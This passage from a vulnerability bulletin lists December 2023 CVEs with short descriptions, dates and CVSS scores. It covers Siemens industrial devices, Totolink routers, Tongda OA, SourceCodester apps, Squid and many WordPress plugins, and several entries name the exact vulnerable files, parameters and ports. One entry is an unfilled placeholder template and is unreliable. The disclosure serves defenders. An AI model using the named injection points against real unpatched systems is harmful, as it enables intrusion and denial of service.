A vulnerability has been identified in SIMATIC CP 1242-7 V2 (incl. SIPLUS variants) (All versions), SIMATIC CP 1243-1 (incl. SIPLUS variants) (All versions), SIMATIC CP 1243-1 DNP3 (incl. SIPLUS variants) (All versions), SIMATIC CP 1243-1 IEC (incl. SIPLUS variants) (All versions), SIMATIC CP 1243-7 LTE (All versions), SIMATIC CP 1243-8 IRC (All versions), SIMATIC CP 1543-1 (All versions), SINAMICS S210 (6SL5...) (All versions >= V6.1 < V6.1 HF2), SIPLUS NET CP 1543-1 (All versions). The webserver implementation of the affected products does not correctly release allocated memory after it has been used. An attacker with network access could use this vulnerability to cause a denial-of-service condition in the webserver of the affected product.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-38380
[email protected][/TD]
[/TR]
[TR]
[TD]
siemens -- multiple_products
[/TD]
[TD]
A vulnerability has been identified in Opcenter Quality (All versions), SIMATIC PCS neo (All versions < V4.1), SINUMERIK Integrate RunMyHMI /Automotive (All versions), Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions < V18 Update 3). The affected application contains an out of bounds write past the end of an allocated buffer when handling specific requests on port 4002/tcp. This could allow an attacker to crash the application. The corresponding service is auto-restarted after the crash.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-46283
[email protected][/TD]
[/TR]
[TR]
[TD]
siemens -- multiple_products
[/TD]
[TD]
A vulnerability has been identified in Opcenter Quality (All versions), SIMATIC PCS neo (All versions < V4.1), SINUMERIK Integrate RunMyHMI /Automotive (All versions), Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions < V18 Update 3). The affected application contains an out of bounds write past the end of an allocated buffer when handling specific requests on port 4002/tcp and 4004/tcp. This could allow an attacker to crash the application. The corresponding service is auto-restarted after the crash.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-46284
[email protected][/TD]
[/TR]
[TR]
[TD]
siemens -- multiple_products
[/TD]
[TD]
A vulnerability has been identified in Opcenter Quality (All versions), SIMATIC PCS neo (All versions < V4.1), SINUMERIK Integrate RunMyHMI /Automotive (All versions), Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions < V18 Update 3). The affected application contains an improper input validation vulnerability that could allow an attacker to bring the service into a Denial-of-Service state by sending a specifically crafted message to 4004/tcp. The corresponding service is auto-restarted after the crash is detected by a watchdog.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-46285
[email protected][/TD]
[/TR]
[TR]
[TD]
siemens -- multiple_products
[/TD]
[TD]
A vulnerability has been identified in RUGGEDCOM RM1224 LTE(4G) EU (All versions < V8.0), RUGGEDCOM RM1224 LTE(4G) NAM (All versions < V8.0), SCALANCE M804PB (All versions < V8.0), SCALANCE M812-1 ADSL-Router (Annex A) (All versions < V8.0), SCALANCE M812-1 ADSL-Router (Annex B) (All versions < V8.0), SCALANCE M816-1 ADSL-Router (Annex A) (All versions < V8.0), SCALANCE M816-1 ADSL-Router (Annex B) (All versions < V8.0), SCALANCE M826-2 SHDSL-Router (All versions < V8.0), SCALANCE M874-2 (All versions < V8.0), SCALANCE M874-3 (All versions < V8.0), SCALANCE M876-3 (EVDO) (All versions < V8.0), SCALANCE M876-3 (ROK) (All versions < V8.0), SCALANCE M876-4 (All versions < V8.0), SCALANCE M876-4 (EU) (All versions < V8.0), SCALANCE M876-4 (NAM) (All versions < V8.0), SCALANCE MUM853-1 (EU) (All versions < V8.0), SCALANCE MUM856-1 (EU) (All versions < V8.0), SCALANCE MUM856-1 (RoW) (All versions < V8.0), SCALANCE S615 (All versions < V8.0), SCALANCE S615 EEC (All versions < V8.0). An Improper Neutralization of Special Elements used in an OS Command with root privileges vulnerability exists in the handling of the DDNS configuration. This could allow malicious local administrators to issue commands on system level after a successful IP address update.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
7.2
[/TD]
[TD]CVE-2023-49691
[email protected][/TD]
[/TR]
[TR]
[TD]
siemens -- multiple_products
[/TD]
[TD]
A vulnerability has been identified in RUGGEDCOM RM1224 LTE(4G) EU (All versions < V7.2.2), RUGGEDCOM RM1224 LTE(4G) NAM (All versions < V7.2.2), SCALANCE M804PB (All versions < V7.2.2), SCALANCE M812-1 ADSL-Router (Annex A) (All versions < V7.2.2), SCALANCE M812-1 ADSL-Router (Annex B) (All versions < V7.2.2), SCALANCE M816-1 ADSL-Router (Annex A) (All versions < V7.2.2), SCALANCE M816-1 ADSL-Router (Annex B) (All versions < V7.2.2), SCALANCE M826-2 SHDSL-Router (All versions < V7.2.2), SCALANCE M874-2 (All versions < V7.2.2), SCALANCE M874-3 (All versions < V7.2.2), SCALANCE M876-3 (EVDO) (All versions < V7.2.2), SCALANCE M876-3 (ROK) (All versions < V7.2.2), SCALANCE M876-4 (All versions < V7.2.2), SCALANCE M876-4 (EU) (All versions < V7.2.2), SCALANCE M876-4 (NAM) (All versions < V7.2.2), SCALANCE MUM853-1 (EU) (All versions < V7.2.2), SCALANCE MUM856-1 (EU) (All versions < V7.2.2), SCALANCE MUM856-1 (RoW) (All versions < V7.2.2), SCALANCE S615 (All versions < V7.2.2), SCALANCE S615 EEC (All versions < V7.2.2). An Improper Neutralization of Special Elements used in an OS Command with root privileges vulnerability exists in the parsing of the IPSEC configuration. This could allow malicious local administrators to issue commands on system level after a new connection is established.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
7.2
[/TD]
[TD]CVE-2023-49692
[email protected][/TD]
[/TR]
[TR]
[TD]
siemens -- opcenter_quality
[/TD]
[TD]
A vulnerability has been identified in Opcenter Quality (All versions), SIMATIC PCS neo (All versions < V4.1), SINUMERIK Integrate RunMyHMI /Automotive (All versions), Totally Integrated Automation Portal (TIA Portal) V14 (All versions), Totally Integrated Automation Portal (TIA Portal) V15.1 (All versions), Totally Integrated Automation Portal (TIA Portal) V16 (All versions), Totally Integrated Automation Portal (TIA Portal) V17 (All versions), Totally Integrated Automation Portal (TIA Portal) V18 (All versions < V18 Update 3). When accessing the UMC Web-UI from affected products, UMC uses an overly permissive CORS policy. This could allow an attacker to trick a legitimate user to trigger unwanted behavior.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2023-46281
[email protected][/TD]
[/TR]
[TR]
[TD]
siemens -- simatic_drive_controller_cpu_1504d_tf
[/TD]
[TD]
Affected devices improperly handle specially crafted packets sent to port 102/tcp. This could allow an attacker to create a denial of service condition. A restart is needed to restore normal operations.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-46156
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
siemens -- sinec_ins
[/TD]
[TD]
A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 2). Affected products do not properly validate the certificate of the configured UMC server. This could allow an attacker to intercept credentials that are sent to the UMC server as well as to manipulate responses, potentially allowing an attacker to escalate privileges.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-48427
[email protected][/TD]
[/TR]
[TR]
[TD]
siemens -- sinec_ins
[/TD]
[TD]
A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 2). Affected software does not correctly validate the response received by an UMC server. An attacker can use this to crash the affected software by providing and configuring a malicious UMC server or by manipulating the traffic from a legitimate UMC server (i.e. leveraging CVE-2023-48427).
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
8.6
[/TD]
[TD]CVE-2023-48431
[email protected][/TD]
[/TR]
[TR]
[TD]
siemens -- sinec_ins
[/TD]
[TD]
A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 2). The radius configuration mechanism of affected products does not correctly check uploaded certificates. A malicious admin could upload a crafted certificate resulting in a denial-of-service condition or potentially issue commands on system level.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
7.2
[/TD]
[TD]CVE-2023-48428
[email protected][/TD]
[/TR]
[TR]
[TD]
silabs -- gsdk
[/TD]
[TD]
An unvalidated input in a library function responsible for communicating between secure and non-secure memory in Silicon Labs TrustZone implementation allows reading/writing of memory in the secure region of memory from the non-secure region of memory.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
9
[/TD]
[TD]CVE-2023-4020
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
silverpeas -- silverpeas
[/TD]
[TD]
Silverpeas Core 6.3.1 is vulnerable to Incorrect Access Control. An attacker with low privileges is able to execute the administrator-only function of putting the application in "Maintenance Mode" due to broken access control. This makes the application unavailable to all users. This affects Silverpeas Core 6.3.1 and below.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
8.1
[/TD]
[TD]CVE-2023-47320
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
silverpeas -- silverpeas
[/TD]
[TD]
The "userModify" feature of Silverpeas Core 6.3.1 is vulnerable to Cross Site Request Forgery (CSRF) leading to privilege escalation. If an administrator goes to a malicious URL while being authenticated to the Silverpeas application, the CSRF with execute making the attacker an administrator user in the application.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2023-47322
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
silverpeas -- silverpeas
[/TD]
[TD]
The notification/messaging feature of Silverpeas Core 6.3.1 does not enforce access control on the ID parameter. This allows an attacker to read all messages sent between other users; including those sent only to administrators.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-47323
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
smartstar_software -- cws_web-base
[/TD]
[TD]
SmartStar Software CWS is a web-based integration platform, its file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-48376
[email protected][/TD]
[/TR]
[TR]
[TD]
smartstar_software -- cws_web-base
[/TD]
[TD]
SmartStar Software CWS is a web-based integration platform, it has a vulnerability of missing authorization and users are able to access data or perform actions that they should not be allowed to perform via commands. An authenticated with normal user privilege can execute administrator privilege, resulting in performing arbitrary system operations or disrupting service.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2023-48375
[email protected][/TD]
[/TR]
[TR]
[TD]
softnext -- mail_sqr_expert
[/TD]
[TD]
Softnext Mail SQR Expert has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-48378
[email protected][/TD]
[/TR]
[TR]
[TD]
softnext -- mail_sqr_expert
[/TD]
[TD]
Softnext Mail SQR Expert is an email management platform, it has insufficient filtering for a special character within a spcific function. A remote attacker authenticated as a localhost can exploit this vulnerability to perform command injection attacks, to execute arbitrary system command, manipulate system or disrupt service.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
7.4
[/TD]
[TD]CVE-2023-48380
[email protected][/TD]
[/TR]
[TR]
[TD]
sourcecodester -- simple_student_attendance_system
[/TD]
[TD]
A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been classified as critical. Affected is an unknown function of the file attendance.php. The manipulation of the argument class_id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-247254 is the identifier assigned to this vulnerability.
[/TD]
[TD]
2023-12-08
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-6617
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
sourcecodester -- simple_student_attendance_system
[/TD]
[TD]
A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /modals/class_form.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247256.
[/TD]
[TD]
2023-12-08
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-6619
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
sourcecodester -- simple_student_attendance_system
[/TD]
[TD]
A vulnerability classified as critical was found in SourceCodester Simple Student Attendance System 1.0. This vulnerability affects unknown code of the file ajax-api.php?action=save_attendance. The manipulation of the argument class_id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-247366 is the identifier assigned to this vulnerability.
[/TD]
[TD]
2023-12-10
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-6658
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
sourcecodester -- simple_student_attendance_system
[/TD]
[TD]
A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file index.php. The manipulation of the argument page leads to file inclusion. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247255.
[/TD]
[TD]
2023-12-08
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2023-6618
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
sourcecodester-- simple_student_attendance_system
[/TD]
[TD]
A vulnerability classified as critical has been found in SourceCodester Simple Student Attendance System 1.0. This affects an unknown part of the file /modals/student_form.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-247365 was assigned to this vulnerability.
[/TD]
[TD]
2023-12-10
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-6657
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
squid -- squid
[/TD]
[TD]
Squid is a caching proxy for the Web. Due to an Uncontrolled Recursion bug in versions 2.6 through 2.7.STABLE9, versions 3.1 through 5.9, and versions 6.0.1 through 6.5, Squid may be vulnerable to a Denial of Service attack against HTTP Request parsing. This problem allows a remote client to perform Denial of Service attack by sending a large X-Forwarded-For header when the follow_x_forwarded_for feature is configured. This bug is fixed by Squid version 6.6. In addition, patches addressing this problem for the stable releases can be found in Squid's patch archives.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
8.6
[/TD]
[TD]CVE-2023-50269
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
suse -- rancher
[/TD]
[TD]
In Rancher 2.x before 2.6.13 and 2.7.x before 2.7.4, an incorrectly applied authorization check allows users who have certain access to a namespace to move that namespace to a different project.
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2020-10676
[email protected]
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
thecosy -- icecms
[/TD]
[TD]
A vulnerability was found in Thecosy IceCMS 2.0.1. It has been classified as problematic. Affected is an unknown function of the file /login of the component Captcha Handler. The manipulation leads to improper restriction of excessive authentication attempts. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247884.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-6756
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
thecosy -- icecms
[/TD]
[TD]
A vulnerability, which was classified as problematic, has been found in Thecosy IceCMS up to 2.0.1. This issue affects some unknown processing of the component User Data Handler. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247889 was assigned to this vulnerability.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2023-6761
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
thecosy -- icecms
[/TD]
[TD]
A vulnerability classified as problematic has been found in Thecosy IceCMS 2.0.1. This affects an unknown part of the file /WebResource/resource of the component Love Handler. The manipulation leads to improper enforcement of a single, unique action. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247887.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-6759
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
tongda2000 -- tongda_oa
[/TD]
[TD]
A vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical. Affected by this issue is some unknown functionality of the file general/notify/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-247244. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
[/TD]
[TD]
2023-12-08
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-6608
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
tongda2000 -- tongda_oa
[/TD]
[TD]
A vulnerability was found in Tongda OA 2017 up to 11.9. It has been declared as critical. This vulnerability affects unknown code of the file pda/pad/email/delete.php. The manipulation of the argument EMAIL_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-247246 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
[/TD]
[TD]
2023-12-08
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-6611
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
tongda -- tongda_office_anywhere
[/TD]
[TD]
A vulnerability has been found in Tongda OA 2017 up to 11.10 and classified as critical. Affected by this vulnerability is an unknown functionality of the file general/wiki/cp/manage/delete.php. The manipulation of the argument TERM_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247243. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
[/TD]
[TD]
2023-12-08
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-6607
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
totolink -- a7000r_firmware
[/TD]
[TD]
TOTOLink A7000R V9.1.0u.6115_B20201022 has a stack overflow vulnerability via setOpModeCfg.
[/TD]
[TD]
2023-12-11
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-49417
[email protected][/TD]
[/TR]
[TR]
[TD]
totolink -- a7000r_firmware
[/TD]
[TD]
TOTOLink A7000R V9.1.0u.6115_B20201022has a stack overflow vulnerability via setIpPortFilterRules.
[/TD]
[TD]
2023-12-11
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-49418
[email protected][/TD]
[/TR]
[TR]
[TD]
totolink -- x5000r_firmware
[/TD]
[TD]
A vulnerability was found in Totolink X5000R 9.1.0cu.2300_B20230112. It has been rated as critical. This issue affects the function setDdnsCfg/setDynamicRoute/setFirewallType/setIPSecCfg/setIpPortFilterRules/setLancfg/setLoginPasswordCfg/setMacFilterRules/setMtknatCfg/setNetworkConfig/setPortForwardRules/setRemoteCfg/setSSServer/setScheduleCfg/setSmartQosCfg/setStaticDhcpRules/setStaticRoute/setVpnAccountCfg/setVpnPassCfg/setVpnUser/setWiFiAclAddConfig/setWiFiEasyGuestCfg/setWiFiGuestCfg/setWiFiRepeaterConfig/setWiFiScheduleCfg/setWizardCfg of the file /cgi-bin/cstecgi.cgi. The manipulation leads to os command injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247247. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
[/TD]
[TD]
2023-12-08
[/TD]
[TD]
9.8
[/TD]
[TD]CVE-2023-6612
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
tutao -- tutanota
[/TD]
[TD]
Tutanota (Tuta Mail) is an encrypted email provider. Tutanota allows users to open links in emails in external applications. Prior to version 3.118.12, it correctly blocks the file: URL scheme, which can be used by malicious actors to gain code execution on a victims computer, however fails to check other harmful schemes such as ftp:, smb:, etc. which can also be used. Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victim's computer. Version 3.118.2 contains a patch for this issue.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
9.3
[/TD]
[TD]CVE-2023-46116
[email protected]
[email protected]
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
undertow -- undertow
[/TD]
[TD]
A flaw was found in Undertow. When an AJP request is sent that exceeds the max-header-size attribute in ajp-listener, JBoss EAP is marked in an error state by mod_cluster in httpd, causing JBoss EAP to close the TCP connection without returning an AJP response. This happens because mod_proxy_cluster marks the JBoss EAP instance as an error worker when the TCP connection is closed from the backend after sending the AJP request without receiving an AJP response, and stops forwarding. This issue could allow a malicious user could to repeatedly send requests that exceed the max-header-size, causing a Denial of Service (DoS).
[/TD]
[TD]
2023-12-12
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-5379
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
vyperlang -- vyper
[/TD]
[TD]
Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine (EVM). Contracts containing large arrays might underallocate the number of slots they need by 1. Prior to v0.3.8, the calculation to determine how many slots a storage variable needed used math.ceil(type_.size_in_bytes / 32). The intermediate floating point step can produce a rounding error if there are enough bits set in the IEEE-754 mantissa. Roughly speaking, if type_.size_in_bytes is large (> 2**46), and slightly less than a power of 2, the calculation can overestimate how many slots are needed by 1. If type_.size_in_bytes is slightly more than a power of 2, the calculation can underestimate how many slots are needed by 1. This issue is patched in version 0.3.8.
[/TD]
[TD]
2023-12-13
[/TD]
[TD]
7.5
[/TD]
[TD]CVE-2023-46247
[email protected]
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
The Digital Publications by Supsystic plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.6. This is due to missing or incorrect nonce validation on the AJAX action handler. This makes it possible for unauthenticated attackers to execute AJAX actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
[/TD]
[TD]
2023-12-09
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2023-5756
[email protected]
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
The EazyDocs WordPress plugin before 2.3.4 does not properly sanitize and escape "data" parameter before using it in an SQL statement via an AJAX action, which could allow any authenticated users, such as subscribers, to perform SQL Injection attacks.
[/TD]
[TD]
2023-12-11
[/TD]
[TD]
8.8
[/TD]
[TD]CVE-2023-6035
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bruno "Aesqe" Babic File Gallery allows Reflected XSS.This issue affects File Gallery: from n/a through 1.8.5.4.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-48771
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in captainform Forms by CaptainForm - Form Builder for WordPress allows Reflected XSS.This issue affects Forms by CaptainForm - Form Builder for WordPress: from n/a through 2.5.3.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-49170
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in TheInnovs Innovs HR - Complete Human Resource Management System for Your Business allows Reflected XSS.This issue affects Innovs HR - Complete Human Resource Management System for Your Business: from n/a through 1.0.3.4.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-49171
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BrainCert BrainCert - HTML5 Virtual Classroom allows Reflected XSS.This issue affects BrainCert - HTML5 Virtual Classroom: from n/a through 1.30.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-49172
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodeRevolution WP Pocket URLs allows Reflected XSS.This issue affects WP Pocket URLs: from n/a through 1.0.2.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-49176
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gilles Dumas which template file allows Reflected XSS.This issue affects which template file: from n/a through 4.9.0.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-49177
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mr. Hdwplayer HDW Player Plugin (Video Player & Video Gallery) allows Reflected XSS.This issue affects HDW Player Plugin (Video Player & Video Gallery): from n/a through 5.0.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-49178
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fabio Marzocca List all posts by Authors, nested Categories and Titles allows Reflected XSS.This issue affects List all posts by Authors, nested Categories and Titles: from n/a through 2.7.10.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-49182
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NextScripts NextScripts: Social Networks Auto-Poster allows Reflected XSS.This issue affects NextScripts: Social Networks Auto-Poster: from n/a through 4.4.2.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-49183
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Doofinder Doofinder WP & WooCommerce Search allows Reflected XSS.This issue affects Doofinder WP & WooCommerce Search: from n/a through 2.1.7.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-49185
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spoonthemes Adifier - Classified Ads WordPress Theme allows Reflected XSS.This issue affects Adifier - Classified Ads WordPress Theme: from n/a before 3.1.4.
[/TD]
[TD]
2023-12-15
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-49187
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
[PROBLEMTYPE] in [COMPONENT] in [VENDOR] [PRODUCT] [VERSION] on [PLATFORMS] allows [ATTACKER] to [IMPACT] via [VECTOR]
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-49739
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themefic Ultimate Addons for Contact Form 7 allows Stored XSS.This issue affects Ultimate Addons for Contact Form 7: from n/a through 3.2.0.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-49766
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Peter Raschendorfer Smart External Link Click Monitor [Link Log] allows Reflected XSS.This issue affects Smart External Link Click Monitor [Link Log]: from n/a through 5.0.2.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-49771
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in J.N. Breetvelt a.K.A. OpaJaap WP Photo Album Plus allows Stored XSS.This issue affects WP Photo Album Plus: from n/a through 8.5.02.005.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-49813
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Soledad - Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme allows Reflected XSS.This issue affects Soledad - Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1.
[/TD]
[TD]
2023-12-14
[/TD]
[TD]
7.1
[/TD]
[TD]CVE-2023-49827
[email protected][/TD]
[/TR]
[TR]
[TD]
wordpress -- wordpress
[/TD]
[TD]
